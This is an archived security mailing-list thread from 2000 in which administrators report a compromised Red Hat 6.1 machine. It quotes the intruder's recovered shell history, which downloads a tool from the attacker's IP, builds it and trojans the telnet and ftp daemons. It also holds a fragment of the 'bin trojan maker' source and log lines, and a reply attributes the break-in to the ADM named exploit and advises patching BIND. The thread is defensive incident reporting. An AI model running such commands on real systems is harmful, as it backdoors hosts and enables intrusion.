Re: succesful crack

[rgupta () INTERLYNX NET (R. Gupta)]

Hello,

    I was also "hacked" from the same originating IP as the intruder on your
system [24.11.98.152 (c505000-a.blfld1.ct.home.com)].  I had been running
Redhat 6.1.  I noticed the intruder added some accounts such as username
"own", and ftp'd to his ip [24.11.98.152] and downloaded fun2.c, and
compiled this.  Upon further investigation, all the named comfiguration
files and binary were removed from my system.  I suspect the intruder had no
idea how to apply any sort of patch, so decided to kill the process and
delete the files so nobody could do the same he did.

-RGUPTA

----- Original Message -----
From: "Gene Harris" <zeus () TETRONSOFTWARE COM>
To: <INCIDENTS () SECURITYFOCUS COM>
Sent: Wednesday, February 16, 2000 9:00 AM
Subject: Re: succesful crack

> On Tue, 15 Feb 2000, Bob Lockie wrote:
>
> >  rjlockie () home net
> >
> >  (613) 765-5409
> >
> >
> >  My box (24.112.89.219) was cracked.
> >
> >  The attack originated from  24.11.98.152
(c505000-a.blfld1.ct.home.com).
> >  It could be this machine was also cracked and it was used as a
launching point.
> >  Please contact the owner and have a talk with them.
> >  The owner should definitely not offer anonymous ftp service.
> >
> >  A few things were left on my system.
> >
> >  drwxr-xr-x   2 root     root         1024 Feb 13 22:03 ADMROCKS
> >
> >  I have no /etc/host.allow or /etc/hosts.deny files anymore.
> >
> >  This was in /tmp/,bash_history.
> >
> >  ftp 24.11.98.152
> >  tar -xvf btm.tar
> >  make
> >  ./btm /usr/sbin/in.telnetd
> >  ./btm /usr/sbin/in.ftpd
> >  rm -rf btm.tar
> >
> >  The following source:
> >
> >  /* bin trojan maker */
> >
> >  #include "btm.h"
> >
> >  #define BTM_VER "btm v1.5"
> >
> >
> >  int options=0;
> >
> >  void usage(char* progname)
> >  {
> >    printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u
compiler]"
> >                  " [-o compiler options] target [trojan
source]\n",progname);
> >    printf("in trojan source, the trojan function must be:\n");
> >    printf("  "TROJAN_FCT"(char** argv,char** envp)\n");
> >    printf("\n");
> >    printf("-d: debug mode\n");
> >    printf("-c: don't trojan, just put the C file on stdout\n");
> >    printf("-l max: max number of char in a line of the C file\n");
> >    printf("-v: display version\n");
> >    printf("-u compiler: use this compiler\n");
> >    printf("-o options: options for compiler\n");
> >    printf("-n: no save for target file\n");
> >    printf("-e: echo commands\n");
> >    printf("-m comments: put comments in btmized file\n");
> >    printf("\n");
> >    exit(0);
> >  }
> >
> >
> >  int getdirname(char* dirname,char* filename,size_t dirname_size)
> >  {
> >
> >    if (!filename) return -1;
> >
> >    if (filename[0]=='/') {
> >      strncpy(dirname,filename,dirname_size);
> >      *(((char*)strrchr(dirname,'/'))+1)=0;
> >    }
> >    else {
> >      if (!getcwd(dirname,dirname_size)) {
> >        perror("getcwd");
> >        return -1;
> >      }
> >    }
> >
> >    return 0;
> >  }
> >
> >
> >  /var/log/secure
> >  Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek
by (uid=0
> >  )
> >  Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by
tek(uid=5
> >  000)
> >
> >
> >
> >  Bob Lockie
> >  bjlockie () nortelnetworks com
> >
> >  Live long and prosper.
>
> You been the victim of a named daemon exploit.
>
> The ADM attack is effective against older versions of named.
> There have been discussions of ADMROCKS and the named
> exploit in this news group in the last several weeks.
> Upgrade named to 8.2.2-P3 at a minimum. If you are running
> RedHat 6.1, they have had an advisory out to upgrade bind
> (named) for quite some time.  Please check their support
> site -> errata -> security.
>
> Good Luck,
> Gene